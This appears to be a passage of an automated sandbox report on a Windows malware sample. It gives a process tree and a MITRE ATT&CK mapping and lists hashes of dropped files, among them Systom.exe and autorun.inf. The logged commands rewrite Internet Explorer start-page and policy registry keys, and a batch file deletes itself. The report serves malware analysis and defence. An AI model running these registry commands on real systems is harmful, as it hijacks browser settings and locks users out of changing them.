    "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
    3⤵
    - Modifies Internet Explorer settings
    PID:2308
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
    3⤵
    - Modifies Internet Explorer settings
    PID:1632
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
    3⤵
    PID:2468
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
    3⤵
    - Modifies Internet Explorer settings
    PID:2316
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
    3⤵
    - Modifies Internet Explorer settings
    PID:2428
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
    3⤵
    PID:1492
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
    3⤵
    - Modifies Internet Explorer settings
    PID:1904
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
    3⤵
    - Modifies Internet Explorer settings
    PID:1404
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
    3⤵
    PID:2880
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
    3⤵
    - Modifies Internet Explorer settings
    PID:1724
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
    3⤵
    - Modifies Internet Explorer settings
    PID:3036
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
    3⤵
    PID:1700
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
    3⤵
    - Modifies Internet Explorer settings
    PID:1768
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
    3⤵
    - Modifies Internet Explorer settings
    PID:1148
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
    3⤵
    PID:2508
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
    3⤵
    - Modifies Internet Explorer settings
    PID:2124
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
    3⤵
    - Modifies Internet Explorer settings
    PID:2172
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
    3⤵
    PID:1712
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
    3⤵
    - Modifies Internet Explorer settings
    PID:1952
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
    3⤵
    PID:1956
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
    3⤵
    PID:1992
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
    3⤵
    - Modifies Internet Explorer settings
    PID:1540
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
    3⤵
    - Modifies Internet Explorer settings
    PID:2108
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
    3⤵
    PID:1636
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
    3⤵
    - Modifies Internet Explorer settings
    PID:2356
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
    3⤵
    - Modifies Internet Explorer settings
    PID:1608
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
    3⤵
    PID:2012
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
    3⤵
    PID:2880
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
    3⤵
    - Modifies Internet Explorer settings
    PID:3024
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
    3⤵
    PID:2656
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
    3⤵
    PID:1816
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
    3⤵
    - Modifies Internet Explorer settings
    PID:772
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
    3⤵
    PID:1108
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
    3⤵
    - Modifies Internet Explorer settings
    PID:1176
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
    3⤵
    - Modifies Internet Explorer settings
    PID:2976
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
    3⤵
    PID:1996
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
    3⤵
    - Modifies Internet Explorer settings
    PID:2924
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
    3⤵
    - Modifies Internet Explorer settings
    PID:2528
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
    3⤵
    PID:1756
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
    3⤵
    - Modifies Internet Explorer settings
    PID:2760
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
    3⤵
    - Modifies Internet Explorer settings
    PID:2088
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
    3⤵
    PID:2752
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\29aee1ebc452c57d9bfaee973ae89873.bat
  2⤵
  PID:1884
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\29aee1ebc452c57d9bfaee973ae89873.bat""
  2⤵
  - Deletes itself
  PID:2908

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-16056037441240331933-2066230749624298003171305080655816849773294420349469388"
1⤵
PID:1656

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-181362951-19072142232024748048814361043783913293235264944-615845393469586995"
1⤵
- Sets file execution options in registry
PID:2484

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1061631238-655928536197065809421069384001101640930-1185731885537052311-736693079"
1⤵
- Sets file execution options in registry
PID:1196

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1923967310-20355602891264898065-193264912-114898951619443122601132513975132553088"
1⤵
- Sets file execution options in registry
PID:2356

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-387273155520954163-1964403031-8262355702142066477-50081556414687370522011800364"
1⤵
PID:1112

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1321833862-75171792189726044913569095341423681822-43456693575480817388421514"
1⤵
- Sets file execution options in registry
PID:876

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-737062511985333286-17229425843988950911647247421-10938406541295123912412048214"
1⤵
PID:2752

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Replication Through Removable Media

T1091

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Replication Through Removable Media

T1091

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
10e98a4f1543c94caaa5f477ad6a211a

SHA1
c61e27e7c45c3fa20dbc063a42c034ca4fd5ab1d

SHA256
71cdd4369d742720152269617f47d9788fce13901034787262bdcc3762fb15c4

SHA512
4279d237fd5fd5c07885eb39bf53e7cf0f279b78a1f784ac4ff602bfa94e73ab68a29bd5e478a29a6842c01f66ac52b13fa4d8ff9b477d3af0a03f8c18ef5b2d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
b02753f7abb4a6be35aa599e5390a4b6

SHA1
4b613d504c0e8b6a6f0cdb5d4ae79df89eb09763

SHA256
5f451c0e9fe86870a31166bb4f0d418602f84e85d8e6fe4b0fdc61dab66d8873

SHA512
ef64ec3ffa9cfd6db40b3afbaf0dfd05cd11d94924c4970ef41a019d62d21dc7502c19c6a3147eb49a14173b1cca72d115f08bfb4c2809d5eed5f2a2abde1b1d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
6a80448b7dcf2eb420945a44e57fec29

SHA1
f570ab7946e2024c1dac1af9453aaff4e5030fec

SHA256
855bd3ca5d2800f25f05eff69763ae727e3d2c2280d44683c0e50427d4e6e02c

SHA512
1afbab67ffaf6d2d1dbdc7b9e240a35641ce02ccafcedf1ac86486852c71c8a236afceab9dd8b851bca925779fe31bf90082f78981421a322caac6d6626e6320

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
58381a7dd0bd6df51f211824972bbaff

SHA1
d8a38238ac67aed0c67728a820c678ba5f58b7b3

SHA256
ce3d5d3cfc57d9f7704765853849e2bf6ceb7acd71f9c4b50b307f650ea6d0ce

SHA512
6cfeb84e15a19966bb6346557943dc7f064f7744d2ecd5fef0995010468a0be3014768762f8e8e02a53a273da88e3d141d6c4381ead0776e8bd805f5079f51d1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
acb7c86bcdbf63e707273ff7c65b6342

SHA1
284cfa86c95a3650536594a4f9d65360dc274832

SHA256
50d47eff66a3c7b97905dabba3398e3b3fdc8b273a150f33d4d7bd92183afc85

SHA512
9132652b1e2c928151245ac9ff3fac941970e3cdd8c0517b35bb15516779ba256879326ff1e34c7894757880b70ff5cd3b764b5696ac102ee4ab8bfeadb4c777

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
414692f1c72e791e57b39855ea411a0e

SHA1
137515c015b30a62f9f907054ea659e9a25ada5f

SHA256
f118b4b3e148d4fd2d2b13e5b6d75ecf377db2378ce801f3574043b19a041d59

SHA512
1f749e981bce11078764980789124230d667adf70e5f0ff16da3868fc5da78f57c07ac6c2a2404bbc5e2c1176b5037aee5b5508adf50574d4fca138369f30c52

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
87a2d0843d0e8c753b9599bfd0f26380

SHA1
3222ca51412a702e356ccaba31745824c1fdd8fa

SHA256
bec4ef79bd99215f79d55269ba6d6c839876cc79b8e5800d0d19f8df7938074a

SHA512
80c8558f732da69dcfce1dc0dcfa228f5bc6cccbe2c5b3129f93975624ee405289d3317e598147732252cf36b1e38d86efd6e7aa4849cb2826cd3500801f24c6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
fe54542f9e85b2a59367f893841ec25b

SHA1
4d7d32ac3021ed7210a2f5d4229877b6b1b4c183

SHA256
7f021c5bf1f09d145db838a2b743940677d1b6d306791a53d4a48bdf6ea8c3fc

SHA512
2d4a80bec67b131002dbb6855c00c1ba64881117de47b32b34a885dcbbf8ae40736038cc30121f04a4021f2076288e732f552fc8c42a5b42d37f804b55db3462

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
150348e053cdb568adec6351a7aac311

SHA1
ae06c0ea1106f7ed1ff8eed6fbdcf55170bd3599

SHA256
ef08dba7d8d60781884dcc754eb6724f93fe2a9d6d5aae37696cfcb981339f47

SHA512
bc8f8060c4ba00a5613b8056681339fc208c248804a9dc2c177cb1c0a3a01c354b791065f3addde217c554b863438bc98a3604a161c479cc86b0ede0e33ef311

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
ba28f7bd069f8c83d78c044d46c3c638

SHA1
8ac5dd82be1465bcd53f90669770043567cf63cf

SHA256
b4a97bba15d1ee5b80d12227ddfec8d24a4a1a5dda27464e7cce35ba45b3aaa3

SHA512
366bf5a1eda9cc0020175ff61a86a85acccda2658c81d97d67c96ea8960d7d5d54ec6046a8bbf31884a2d544fb77599f6dbe82154797f4cd1c4a8d0bd7cf8935

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
a69e608a906e70c41e1d0e7b80df6917

SHA1
f819c7bf3182fa1c1725fbf64a318f0ea0230056

SHA256
dc0081721b76b2258255b4d44b80380189e0c007deeff7c3e021872421dd5a82

SHA512
11c77af41e5a34d02ca7d824cc752d84a412416c53cb086745ec2ec9c38e161567e1e7ec8210141ced982b5ab34559191f01cb228b2e0322292c953d958e520b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
59cbd57a377e763d73bfe3c7a849d6fc

SHA1
1d3e2fd0c35c125225192aa3d288883ecfd31875

SHA256
7cc5fe56c3f380fe791892248866e49e4ed1f3e38e46e013362f149e5a82dfd4

SHA512
e33cca778f7d458111bc6fdfe4b4fc5d8995d6db007461f7c63cbc4b4c863c50ec14f7c2546f4f4684e70d194a3e8feba4fd88ace60c339c63e30e3ea9795b50

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
19538e7a6dfc26a540a210510ae7bead

SHA1
513cb4e7821695985ba9a691c91ba6d0239ebed3

SHA256
62cef6b9a31e0a56dd65180e5476b107b6808f4e4c4c3568ae2b68b1ca47f495

SHA512
04b71b9d2e65261bbb28a6aef6a520c8b74b2e911d8217a80765970ba3a1d15ec689ac22f489e5d76dad19b6b6907c86a5bd1f39a0a9ce9e3f9bc76c425c7df1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
c2cc2b84e2f27de2e55414774e57ea12

SHA1
f1263de93a4fb8989b2e9f511e027ca80e59aad6

SHA256
f516ef010ddd385d7e6041c7f9079ee292a7a251ae651b44a6f468b32f95ef21

SHA512
101ecb717fcf678df2468834e5e10de574c7b67c666dd2040d706fd49edb562d98194adb61e09cb5fdf912fc33c7b2a335386f11d249169588dce9e796207ff4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
d845576ef61f84c905fd157f37e7eac7

SHA1
98f5dede0d5717748dcace62a3b27c556566d31d

SHA256
5ce9df0abb420835c4a0e17fe99c08aa5df19fa7b993b540b0a9c870063b2e6c

SHA512
a0a02458619d4859625fd487f555bfea068d85171ae8fecbb084ea5050fc936bd46d1319245ce88a317758140d55eb1d949606538f3d7195cdfeaa363bd498b6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
cf51b933f346e8a9890744d793cee72d

SHA1
542ef41868a9c482a932305da37cd39e5bc5cf99

SHA256
464b769922f6db149d0f3d57f79269f9f2a2ec04e971db680770d54304290040

SHA512
bef64e120554c2181056c06b21e1c4e211cc2e8c17c7779c266641c89044d191ab12bf8102023625fed8068d4bc4327fe5bf56dfe349a0780f84de019898e0b1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
cf382fad493bbe6794f692785850a297

SHA1
d17d68f2d1773a2985f5f4f58979992d5fc7ed62

SHA256
98ea8f91d712df4b5ed6786b000e84f2a89d89d4949c488771caf3712ad68045

SHA512
8ff4c2b223667429e7b5de12bce25a4f5760dc42669a03bdd69af9933ac31a8a8fbf45f65a1d9f726f44f167e691b1a40566f2ab123755b49de6c059f811ff45

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
3dbe8decd21a0f93dc9f934fcb45119c

SHA1
b612fca15ba5fd385ee2a0f5ae834510f712f846

SHA256
221988ca050c95d822cfac9d9df3c80dc862fb6f2c94526ef010ebb8614438fb

SHA512
316b9f46be3d65c6767d7e55a8d04b009ba6cc6092ea7f3ddee4425d027d9d5099bd1df549bd4d3285f15f8a629ac106ad00dfc9e9a259207c751e61fd774bff

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
aca97e099dfbdc2f552328a514319287

SHA1
1915a8ceac9b5c39b5c4a4dbd7b43da3b543b8db

SHA256
b76d67ff5fcab5c614c23ad1f03bf69d8e975d5cd5e796b07d565314160b7d4e

SHA512
44d3768a3b8dd260a04e53a3e84166847d73cefdda6541f875f8807b06f29c9f8926430b7de12c5f36e82613164c6b1d8f9a1b5c20a6a281c0b75e9eb80a80a6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
1fc106667e261d484eb799484672c7b3

SHA1
a5243d245aa2232f2715050ec8a76fb641628c51

SHA256
2c6fa81c88907c48325a75198a565899a9e0664533c043b174802680f0bc3dcf

SHA512
c0a83d00e8c9acab9191afdd07332b3e5d72a0abd050ec971487cafbd2b3cd107f01b99ee15ebb328dd6ea334b2b9e815234329763f21104046b1bb525008944

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
edff90dd2ed72b0283aacf6c16b95414

SHA1
b07b4bd867355f6643ea9697309189337e8766df

SHA256
cba5bc253e4f5d38e6e91e9b7c4f38df8d1680c0abb6d99a98d44e01cc4a217a

SHA512
0aa71df721f98386787292f85a9bbfbe8ca921b0c4a6e7cb0f1d63a3fd850d49b1215baba6dee07d47f9c193086faf8db7f90dad9998b66fe4508c263f8bcd7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\29aee1ebc452c57d9bfaee973ae89873.bat

Filesize
184B

MD5
71d35bc5913c09e9eb6a11d9f29e65d8

SHA1
7055487dafa72344122e6fa156b214c919a111cd

SHA256
099774f0f772cb4f0b476acd7683dbe1d39fa91f1c65a98604bc88ad1f576eb9

SHA512
2e12fc58e7b867a00f1cf11c391a3ea49ad49a927e043e344f6e5087f07bd3ffc6aa2de447bc47858ef9af90b5943341e8846f423ab5b21937829c8c52304bf8

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabD5C9.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarD7EE.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Windows\SysWOW64\auToRun.inf

Filesize
156B

MD5
a1d4181824dc5e8ecec8369fa67864e4

SHA1
e1ec2b149df84a6b73d6e51fb696c79cac9fc4e6

SHA256
f6d56418c59ba518590b873917ec7fda9b7555b75161fc017e04d889dcfff9a5

SHA512
e36a3c5341fed3714d3dcd1c48faf24dc4207809d246b21f9988c655acf63cb6dc5a0d6888be8303af90905087d798c264f936cbcd39019897ccc26c9ee4c07f

Download Submit
\Windows\SysWOW64\Systom.exe

Filesize
27KB

MD5
29aee1ebc452c57d9bfaee973ae89873

SHA1
194151b20390a3a62032edc9de03f018817c060e

SHA256
69d28d8e343dde25f6a6cd12a50e50137e699863d69638aa5682bc213a28615c

SHA512
89a9b537feb77f227f6ba7e3b9d6345e4c7a4381eec1d9f720e9ae46e5154f6a5bf6b37b0c2b47f953ec56743084f89d8d586095be4c578a52c27aa645cbe11d

Download Submit
memory/3036-3-0x0000000000220000-0x0000000000239000-memory.dmp

Filesize
100KB

Download
memory/3036-0-0x0000000000400000-0x0000000000419000-memory.dmp

Filesize
100KB

Download
memory/3036-9-0x0000000000220000-0x0000000000239000-memory.dmp

Filesize
100KB

Download
memory/3036-26-0x0000000000400000-0x0000000000419000-memory.dmp

Filesize
100KB

Download
memory/3056-1069-0x0000000000400000-0x0000000000419000-memory.dmp

Filesize
100KB

Download
memory/3056-689-0x0000000000400000-0x0000000000419000-memory.dmp

Filesize
100KB

Download
memory/3056-680-0x0000000000400000-0x0000000000419000-memory.dmp

Filesize
100KB

Download
memory/3056-12-0x0000000000400000-0x0000000000419000-memory.dmp

Filesize
100KB

Download
memory/3056-643-0x0000000000400000-0x0000000000419000-memory.dmp

Filesize
100KB

Download
memory/3056-581-0x0000000000400000-0x0000000000419000-memory.dmp

Filesize
100KB

Download
memory/3056-693-0x0000000000400000-0x0000000000419000-memory.dmp

Filesize
100KB

Download
memory/3056-692-0x0000000000400000-0x0000000000419000-memory.dmp

Filesize
100KB

Download
memory/3056-46-0x0000000000400000-0x0000000000419000-memory.dmp

Filesize
100KB

Download
memory/3056-317-0x0000000000400000-0x0000000000419000-memory.dmp

Filesize
100KB

Download
memory/3056-1344-0x0000000000400000-0x0000000000419000-memory.dmp

Filesize
100KB

Download
memory/3056-1367-0x0000000000400000-0x0000000000419000-memory.dmp

Filesize
100KB

Download
memory/3056-1390-0x0000000000400000-0x0000000000419000-memory.dmp

Filesize
100KB

Download
memory/3056-1413-0x0000000000400000-0x0000000000419000-memory.dmp

Filesize
100KB

Download
memory/3056-1436-0x0000000000400000-0x0000000000419000-memory.dmp

Filesize
100KB

Download
memory/3056-1459-0x0000000000400000-0x0000000000419000-memory.dmp

Filesize
100KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads